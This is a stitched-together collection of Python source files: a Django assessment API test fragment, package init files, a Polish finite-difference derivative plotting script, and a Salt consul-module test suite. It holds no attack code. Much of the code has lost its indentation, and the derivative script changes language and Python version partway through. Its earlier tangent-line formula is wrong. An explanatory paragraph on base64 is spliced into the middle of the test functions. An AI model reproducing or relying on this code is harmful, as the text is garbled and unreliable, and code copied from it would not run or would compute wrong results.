                'target': target.id,
                'rubric': rubric.id,
                'answers': json.dumps([
                    {'metric': 1, 'answer': 'no'},
                    {'metric': 2, 'answer': 'no'},
                    {'metric': 3, 'answer': 'no'},
                ]),
            }),
            content_type='application/json',
            HTTP_ACCEPT='application/json',
        )
        self.assertEqual(response.status_code, 401)
        self.assertEqual(response['Content-Type'], 'application/json', response)
        try:
            models.Assessment.objects.get(project=project, rubric=rubric, target=target)
            self.fail('Found assessment')
        except models.Assessment.DoesNotExist:
            pass
        response = self.authenticated_client.post(
            '/assessment/',
            json.dumps({
                'project': project.id,
                'target': target.id,
                'rubric': rubric.id,
                'answers': [
                    {'metric': 1, 'answer': 0.0},
                    {'metric': 2, 'answer': 0.0},
                    {'metric': 3, 'answer': 0.0},
                ],
            }),
            content_type='application/json',
            HTTP_ACCEPT='application/json',
        )
        self.assertEqual(response.status_code, 201)
        self.assertEqual(response['Content-Type'], 'application/json', response)
        self.assertEqual(
            models.Assessment.objects.get(assessor=author, project=project, rubric=rubric, target=target).answers.count(),
            3
        )

# File: Flask/NationalEducationRadio/NationalEducationRadio/__init__.py
# Repo: Jessieluu/WIRL_national_education_radio (licence: MIT)
from NationalEducationRadio.service import *
from NationalEducationRadio.controllers import *
from NationalEducationRadio.controllers.admin import *
from NationalEducationRadio.controllers.admin.ajax import *
from NationalEducationRadio.models.db import *

# File: src/test/resources/python-code-examples/from_importing_multidot.py
# Repo: florayym/depends (licences: BSD-3-Clause, MIT)
import pkg.imported
pkg.imported.foo()

# File: datapackage_pipelines_measure/pipeline_steps/__init__.py
# Repo: pombredanne/measure (licence: MIT)
from . import (
    social_media,
    code_hosting,
    code_packaging,
    website_analytics,
    outputs,
    email,
    forums,
    forum_categories,
    example
)

__all__ = ['social_media', 'code_hosting', 'code_packaging',
           'website_analytics', 'outputs', 'email', 'forums',
           'forum_categories', 'example']

# File: pochodna.py
# Repo: Rafal14/Metody_numeryczne (licence: MIT)
# -*- coding: utf-8 -*-
import numpy as np
from scipy.misc import derivative
import matplotlib.pyplot as pt
#Definicje funkcji
def f(x):
'''Zwraca wartość dla funkcji eksponencjalnej'''
return np.exp(x)
def g(x):
'''Zwraca wartość dla funkcji exp(-(x**2))'''
return np.exp((x**2)*(-1))
def j(x):
'''Zwraca wartość dla funkcji (x**2)*log(x)'''
logarytm=np.log10(x)
return (x**2)*logarytm
def k(x):
'''Zwraca wartość dla funkcji 1/((1 + x**2)**(1/2))'''
pierwiastek=np.sqrt(1 + (x**2))
return 1/pierwiastek
print "Przybliżanie pochodnej funkcji e^(x)"
print "Podaj przedział do obliczenia pochodnej"
#określenie przedziału
dolna_gr = float(raw_input("Dolna granica przedziału: "))
gorna_gr = float(raw_input("Górna granica przedziału: "))
#określa otoczenie punktu x0
h = (gorna_gr - dolna_gr)/2
#wyznaczenie środka przedziału
x0 = (dolna_gr + gorna_gr)/2
print "Środek przedziału x0 = ", x0
print "h = ", h
#wartość funkcji f w punkcie x0
wart_f_x0 = f(x0)
z1=dolna_gr-1
z2=gorna_gr+1
#zakres osi x
to = np.arange(z1,z2, 0.1)
t = np.arange(dolna_gr, gorna_gr, 0.1)
#obliczenie pochodnej funkcji f w pkt x0
pochodnaf_Oh = (f(x0+h)-f(x0))/h
pochodnaf_Oh2= (f(x0+h)-f(x0-h))/(h*2)
#wypisanie przybliżenia wartości pochodnej w pkt x0
print "f'(x0) = ", pochodnaf_Oh, "z dok. O(h)"
print "f'(x0) = ", pochodnaf_Oh2, "z dok. O(h**2)"
#wykreślenie stycznych określonych przez pochodną funkcji
# f z dokładnością O(h) i O(h**2)
pt.figure(1)
wyk = pt.subplot(111)
#Wykreślenie charakterystyki funkcji exp(x)
wyk.plot(to, f(to), 'r', label='exp(x)')
wyk.grid(True)
wyk.hold(True)
#Wykreślenie stycznej do funkcji exp(x) z dokładnością O(h)
wyk.plot(t, pochodnaf_Oh*t + wart_f_x0, 'b', label='Przyblizenie pochodnej \nfunkcji exp(x) z dok. O(h)')
#Wykreślenie stycznej do funkcji exp(x) z dokładnością O(h^2)
wyk.plot(t, pochodnaf_Oh2 * t + wart_f_x0, 'k', label='Przyblizenie pochodnej \nfunkcji exp(x) z dok. O(h^2)')
#dodanie legendy
wyk.legend()
pt.xlabel('Czas [s]', fontsize=12, color='black')
pt.ylabel('Wartosc funkcji')
pt.title('Charakterystyka exp(x) i jej pochodne', fontsize=12, color='black')
pt.show()
#===============================================================================
print "\nPrzybliżanie pochodnej funkcji e^(-x**2)"
print "Podaj przedział do obliczenia pochodnej"
#określenie przedziału
dolna_gr = float(raw_input("Dolna granica przedziału: "))
gorna_gr = float(raw_input("Górna granica przedziału: "))
#określa otoczenie punktu x0
h = (gorna_gr - dolna_gr)/2
#wyznaczenie środka przedziału
x0 = (dolna_gr + gorna_gr)/2
print "Środek przedziału x0 = ", x0
print "h = ", h
#wartość funkcji g w punkcie x0
wart_g_x0 = g(x0)
z1=dolna_gr-1
z2=gorna_gr+1
#zakres osi x
to = np.arange(z1,z2, 0.1)
t = np.arange(dolna_gr, gorna_gr, 0.1)
#obliczenie pochodnej funkcji g w pkt x0
pochodnag_Oh = (g(x0+h)-g(x0))/h
pochodnag_Oh2= (g(x0+h)-g(x0-h))/(h*2)
#wypisanie przybliżenia wartości pochodnej w pkt x0
print "g'(x0) = ", pochodnag_Oh, "z dok. O(h)"
print "g'(x0) = ", pochodnag_Oh2, "z dok. O(h**2)"
#wykreślenie stycznych określonych przez pochodną funkcji
# g z dokładnością O(h) i O(h**2)
pt.figure(2)
wyk = pt.subplot(111)
#Wykreślenie charakterystyki funkcji exp(-x**2)
wyk.plot(to, g(to), 'r', label='exp(-x**2)')
wyk.grid(True)
wyk.hold(True)
#Wykreślenie stycznej do funkcji exp(-x**2) z dokładnością O(h)
wyk.plot(t, pochodnag_Oh*t + wart_g_x0, 'b', label='Przyblizenie pochodnej \nfunkcji exp(-x**2) z dok. O(h)')
#Wykreślenie stycznej do funkcji exp(x) z dokładnością O(h^2)
wyk.plot(t, pochodnag_Oh2 * t + wart_g_x0, 'k', label='Przyblizenie pochodnej \nfunkcji exp(-x**2) z dok. O(h^2)')
#dodanie legendy
wyk.legend()
pt.xlabel('Czas [s]', fontsize=12, color='black')
pt.ylabel('Wartosc funkcji')
pt.title('Charakterystyka exp(-x**2) i jej pochodne', fontsize=12, color='black')
pt.show()
#====================================================================
print "\nPrzybliżanie pochodnej funkcji (x^2)log(x)"
print "Podaj przedział do obliczenia pochodnej"
#określenie przedziału
dolna_gr = float(raw_input("Dolna granica przedziału: "))
gorna_gr = float(raw_input("Górna granica przedziału: "))
#określa otoczenie punktu x0
h = (gorna_gr - dolna_gr)/2
#wyznaczenie środka przedziału
x0 = (dolna_gr + gorna_gr)/2
print "Środek przedziału x0 = ", x0
print "h = ", h
#wartość funkcji j w punkcie x0
wart_j_x0 = j(x0)
z1=0.001
z2=gorna_gr+1
#zakres osi x
to = np.arange(z1,z2, 0.1)
t = np.arange(dolna_gr, gorna_gr, 0.1)
#obliczenie pochodnej funkcji j w pkt x0
pochodnaj_Oh = (j(x0+h)-j(x0))/h
pochodnaj_Oh2= (j(x0+h)-j(x0-h))/(h*2)
#wypisanie przybliżenia wartości pochodnej w pkt x0
print "j'(x0) = ", pochodnaj_Oh, "z dok. O(h)"
print "j'(x0) = ", pochodnaj_Oh2, "z dok. O(h**2)"
# plot the tangents defined by the derivative of j
# with O(h) and O(h**2) accuracy
pt.figure(3)
wyk = pt.subplot(111)
# plot the function (x^2)log(x) itself
wyk.plot(to, j(to), 'r', label='(x**2)log(x)')
wyk.grid(True)
# plot the tangent to (x**2)log(x) with O(h) accuracy
wyk.plot(t, pochodnaj_Oh*(t - x0) + wart_j_x0, 'b', label='Derivative approximation of\n(x**2)log(x), O(h) accurate')
# plot the tangent to (x**2)log(x) with O(h^2) accuracy
wyk.plot(t, pochodnaj_Oh2*(t - x0) + wart_j_x0, 'k', label='Derivative approximation of\n(x**2)log(x), O(h^2) accurate')
# add the legend
wyk.legend()
pt.xlabel('x', fontsize=12, color='black')
pt.ylabel('Function value')
pt.title('(x**2)log(x) and its derivative approximations', fontsize=12, color='black')
pt.show()
#====================================================================
print("\nApproximating the derivative of 1/(sqrt(1 + x^2))")
print("Enter the interval over which to approximate the derivative")
# read the interval bounds
dolna_gr = float(input("Lower bound of the interval: "))
gorna_gr = float(input("Upper bound of the interval: "))
# step h is half the interval width (the neighbourhood of x0)
h = (gorna_gr - dolna_gr)/2
# x0 is the midpoint of the interval
x0 = (dolna_gr + gorna_gr)/2
print("Interval midpoint x0 = ", x0)
print("h = ", h)
# value of the function k at x0
wart_k_x0 = k(x0)
z1 = dolna_gr - 1
z2 = gorna_gr + 1
# x-axis ranges
to = np.arange(z1, z2, 0.1)
t = np.arange(dolna_gr, gorna_gr, 0.1)
# approximate the derivative of k at x0
pochodnak_Oh = (k(x0+h) - k(x0))/h           # forward difference, O(h)
pochodnak_Oh2 = (k(x0+h) - k(x0-h))/(2*h)    # central difference, O(h**2)
# print the derivative approximations at x0
print("k'(x0) = ", pochodnak_Oh, "with O(h) accuracy")
print("k'(x0) = ", pochodnak_Oh2, "with O(h**2) accuracy")
# plot the tangents defined by the derivative of k
# with O(h) and O(h**2) accuracy
pt.figure(4)
wyk = pt.subplot(111)
# plot the function 1/(sqrt(1 + x^2)) itself
wyk.plot(to, k(to), 'r', label='1/(sqrt(1 + x**2))')
wyk.grid(True)
# plot the tangent to 1/(sqrt(1 + x**2)) with O(h) accuracy
wyk.plot(t, pochodnak_Oh*(t - x0) + wart_k_x0, 'b', label='Derivative approx. of\n1/(sqrt(1 + x**2)), O(h) accurate')
# plot the tangent to 1/(sqrt(1 + x**2)) with O(h^2) accuracy
wyk.plot(t, pochodnak_Oh2*(t - x0) + wart_k_x0, 'k', label='Derivative approx. of\n1/(sqrt(1 + x**2)), O(h^2) accurate')
# add the legend
wyk.legend()
pt.xlabel('x', fontsize=12, color='black')
pt.ylabel('Function value')
pt.title('1/(sqrt(1 + x**2)) and its derivative approximations', fontsize=12, color='black')
pt.show()
"""
Test case for the consul execution module
"""
import logging
import pytest
import salt.modules.consul as consul
import salt.utils.http
import salt.utils.json
import salt.utils.platform
from salt.exceptions import SaltInvocationError
from tests.support.mock import MagicMock, patch
log = logging.getLogger(__name__)
@pytest.fixture
def configure_loader_modules():
return {
consul: {
"__opts__": {"consul": {"url": "http://127.0.0.1", "token": "test_token"}},
"__grains__": {"id": "test-minion"},
}
}
def test_list():
"""
Test salt.modules.consul.list function
"""
mock_query = MagicMock(return_value={"data": ["foo"], "res": True})
with patch.object(consul, "_query", mock_query):
consul_return = consul.list_(consul_url="http://127.0.0.1", token="test_token")
assert consul_return == {"data": ["foo"], "res": True}
def test_get():
"""
Test salt.modules.consul.get function
"""
#
# No key argument results in SaltInvocationError, exception
#
with pytest.raises(SaltInvocationError):
        consul.get(consul_url="http://127.0.0.1", token="test_token")
mock_query = MagicMock(
return_value={
"data": [
{
"LockIndex": 0,
"Key": "foo",
"Flags": 0,
"Value": "YmFy",
"CreateIndex": 128,
"ModifyIndex": 128,
},
],
"res": True,
}
)
with patch.object(consul, "_query", mock_query):
consul_return = consul.get(
consul_url="http://127.0.0.1", key="foo", token="test_token"
)
_expected = {
"data": [
{
"CreateIndex": 128,
"Flags": 0,
"Key": "foo",
"LockIndex": 0,
"ModifyIndex": 128,
"Value": "YmFy",
}
],
"res": True,
}
assert consul_return == _expected
mock_query = MagicMock(
return_value={
"data": [
{
"LockIndex": 0,
"Key": "foo",
"Flags": 0,
"Value": "b'bar'",
"CreateIndex": 128,
"ModifyIndex": 128,
},
],
"res": True,
}
)
with patch.object(consul, "_query", mock_query):
consul_return = consul.get(
consul_url="http://127.0.0.1", key="foo", token="test_token"
)
_expected = {
"data": [
{
"CreateIndex": 128,
"Flags": 0,
"Key": "foo",
"LockIndex": 0,
"ModifyIndex": 128,
"Value": "b'bar'",
}
],
"res": True,
}
assert consul_return == _expected
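Consul's KV HTTP API returns stored values base64-encoded, which is why the first mocked payload above carries "YmFy" rather than the plain string "bar". A minimal standalone sketch of the decode step a caller would perform (not part of this test suite):

```python
import base64

# Consul's KV endpoint base64-encodes the Value field; "YmFy" decodes to "bar".
stored_value = "YmFy"
decoded = base64.b64decode(stored_value).decode("utf-8")
print(decoded)  # bar
```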
def test_put():
"""
Test salt.modules.consul.put function
"""
#
# No key argument results in SaltInvocationError, exception
#
with pytest.raises(SaltInvocationError):
consul.put(consul_url="http://127.0.0.1", token="test_token")
#
# Test when we're unable to connect to Consul
#
mock_consul_get = {
"data": [
{
"LockIndex": 0,
"Key": "web/key1",
"Flags": 0,
"Value": "ImhlbGxvIHRoZXJlIg==",
"CreateIndex": 299,
"ModifyIndex": 299,
}
],
"res": True,
}
with patch.object(consul, "session_list", MagicMock(return_value=[])):
with patch.object(consul, "get", MagicMock(return_value=mock_consul_get)):
ret = consul.put(
consul_url="http://127.0.0.1:8501",
token="test_token",
key="web/key1",
value="Hello world",
)
    expected_res = False
expected_data = "Unable to add key web/key1 with value Hello world."
if salt.utils.platform.is_windows():
expected_error = "Unknown error"
else:
expected_error = "Connection refused"
assert not ret["res"]
assert expected_data == ret["data"]
assert expected_error in ret["error"]
#
# Working as expected
#
mock_query = MagicMock(
return_value={
"data": [
{
"LockIndex": 0,
"Key": "foo",
"Flags": 0,
"Value": "YmFy",
"CreateIndex": 128,
"ModifyIndex": 128,
},
],
"res": True,
}
)
with patch.object(consul, "session_list", MagicMock(return_value=[])):
with patch.object(consul, "get", MagicMock(return_value=mock_consul_get)):
with patch.object(consul, "_query", mock_query):
ret = consul.put(
consul_url="http://127.0.0.1:8500",
token="test_token",
key="web/key1",
value="Hello world",
)
_expected = {"res": True, "data": "Added key web/key1 with value Hello world."}
assert ret == _expected
def test_delete():
"""
Test salt.modules.consul.delete function
"""
#
# No key argument results in SaltInvocationError, exception
#
with pytest.raises(SaltInvocationError):
        consul.delete(consul_url="http://127.0.0.1", token="test_token")
#
# Test when we're unable to connect to Consul
#
ret = consul.delete(
consul_url="http://127.0.0.1:8501",
token="test_token",
key="web/key1",
value="Hello world",
)
    expected_res = False
expected_data = "Unable to delete key web/key1."
if salt.utils.platform.is_windows():
expected_error = "Unknown error"
else:
expected_error = "Connection refused"
assert not ret["res"]
assert expected_data == ret["message"]
assert expected_error in ret["error"]
#
# Working as expected
#
mock_query = MagicMock(return_value={"data": True, "res": True})
with patch.object(consul, "_query", mock_query):
ret = consul.delete(
consul_url="http://127.0.0.1:8500",
token="test_token",
key="web/key1",
value="Hello world",
)
_expected = {"res": True, "message": "Deleted key web/key1."}
assert ret == _expected
def test_agent_maintenance():
"""
Test consul agent maintenance
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
result = consul.agent_maintenance(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
# no required argument
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = 'Required parameter "enable" is missing.'
result = consul.agent_maintenance(consul_url=consul_url)
expected = {"message": msg, "res": False}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Agent maintenance mode {}ed."
value = "enabl"
result = consul.agent_maintenance(consul_url=consul_url, enable=value)
expected = {"message": msg.format(value), "res": True}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to change maintenance mode for agent."
value = "enabl"
result = consul.agent_maintenance(consul_url=consul_url, enable=value)
expected = {"message": msg, "res": True}
assert expected == result
def test_agent_join():
"""
Test consul agent join
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
result = consul.agent_join(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
# no required argument
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = 'Required parameter "address" is missing.'
pytest.raises(
SaltInvocationError, consul.agent_join, consul_url=consul_url
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Agent joined the cluster"
result = consul.agent_join(consul_url=consul_url, address="test")
expected = {"message": msg, "res": True}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to join the cluster."
value = "enabl"
result = consul.agent_join(consul_url=consul_url, address="test")
expected = {"message": msg, "res": False}
assert expected == result
def test_agent_leave():
"""
Test consul agent leave
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
            result = consul.agent_leave(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
node = "node1"
# no required argument
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
pytest.raises(
SaltInvocationError, consul.agent_leave, consul_url=consul_url
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Node {} put in leave state."
result = consul.agent_leave(consul_url=consul_url, node=node)
expected = {"message": msg.format(node), "res": True}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to change state for {}."
result = consul.agent_leave(consul_url=consul_url, node=node)
expected = {"message": msg.format(node), "res": False}
assert expected == result
def test_agent_check_register():
"""
Test consul agent check register
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
result = consul.agent_check_register(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
name = "name1"
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
pytest.raises(
SaltInvocationError,
consul.agent_check_register,
consul_url=consul_url,
)
# missing script, or http
msg = 'Required parameter "script" or "http" is missing.'
result = consul.agent_check_register(consul_url=consul_url, name=name)
expected = {"message": msg, "res": False}
assert expected == result
# missing interval
msg = 'Required parameter "interval" is missing.'
result = consul.agent_check_register(
consul_url=consul_url,
name=name,
script="test",
http="test",
ttl="test",
)
expected = {"message": msg, "res": False}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Check {} added to agent."
result = consul.agent_check_register(
consul_url=consul_url,
name=name,
script="test",
http="test",
ttl="test",
interval="test",
)
expected = {"message": msg.format(name), "res": True}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to add check to agent."
result = consul.agent_check_register(
consul_url=consul_url,
name=name,
script="test",
http="test",
ttl="test",
interval="test",
)
expected = {"message": msg.format(name), "res": False}
assert expected == result
def test_agent_check_deregister():
"""
    Test consul agent check deregister
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
            result = consul.agent_check_deregister(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
checkid = "id1"
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
pytest.raises(
SaltInvocationError,
consul.agent_check_deregister,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Check {} removed from agent."
result = consul.agent_check_deregister(
consul_url=consul_url, checkid=checkid
)
expected = {"message": msg.format(checkid), "res": True}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to remove check from agent."
result = consul.agent_check_deregister(
consul_url=consul_url, checkid=checkid
)
expected = {"message": msg.format(checkid), "res": False}
assert expected == result
def test_agent_check_pass():
"""
Test consul agent check pass
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
            result = consul.agent_check_pass(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
checkid = "id1"
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
pytest.raises(
SaltInvocationError,
consul.agent_check_pass,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Check {} marked as passing."
result = consul.agent_check_pass(consul_url=consul_url, checkid=checkid)
expected = {"message": msg.format(checkid), "res": True}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to update check {}."
result = consul.agent_check_pass(consul_url=consul_url, checkid=checkid)
expected = {"message": msg.format(checkid), "res": False}
assert expected == result
def test_agent_check_warn():
"""
Test consul agent check warn
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
            result = consul.agent_check_warn(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
checkid = "id1"
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
pytest.raises(
SaltInvocationError,
consul.agent_check_warn,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Check {} marked as warning."
result = consul.agent_check_warn(consul_url=consul_url, checkid=checkid)
expected = {"message": msg.format(checkid), "res": True}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to update check {}."
result = consul.agent_check_warn(consul_url=consul_url, checkid=checkid)
expected = {"message": msg.format(checkid), "res": False}
assert expected == result
def test_agent_check_fail():
"""
    Test consul agent check fail
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
            result = consul.agent_check_fail(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
checkid = "id1"
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
pytest.raises(
SaltInvocationError,
consul.agent_check_fail,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Check {} marked as critical."
result = consul.agent_check_fail(consul_url=consul_url, checkid=checkid)
expected = {"message": msg.format(checkid), "res": True}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to update check {}."
result = consul.agent_check_fail(consul_url=consul_url, checkid=checkid)
expected = {"message": msg.format(checkid), "res": False}
assert expected == result
def test_agent_service_register():
"""
Test consul agent service register
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
result = consul.agent_service_register(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
name = "name1"
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
pytest.raises(
SaltInvocationError,
consul.agent_service_register,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Service {} registered on agent."
result = consul.agent_service_register(
consul_url=consul_url,
name=name,
script="test",
http="test",
ttl="test",
interval="test",
)
expected = {"message": msg.format(name), "res": True}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to register service {}."
result = consul.agent_service_register(
consul_url=consul_url,
name=name,
script="test",
http="test",
ttl="test",
interval="test",
)
expected = {"message": msg.format(name), "res": False}
assert expected == result
def test_agent_service_deregister():
"""
Test consul agent service deregister
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
result = consul.agent_service_deregister(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
serviceid = "sid1"
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
pytest.raises(
SaltInvocationError,
consul.agent_service_deregister,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Service {} removed from agent."
result = consul.agent_service_deregister(
consul_url=consul_url, serviceid=serviceid
)
expected = {"message": msg.format(serviceid), "res": True}
assert expected == result
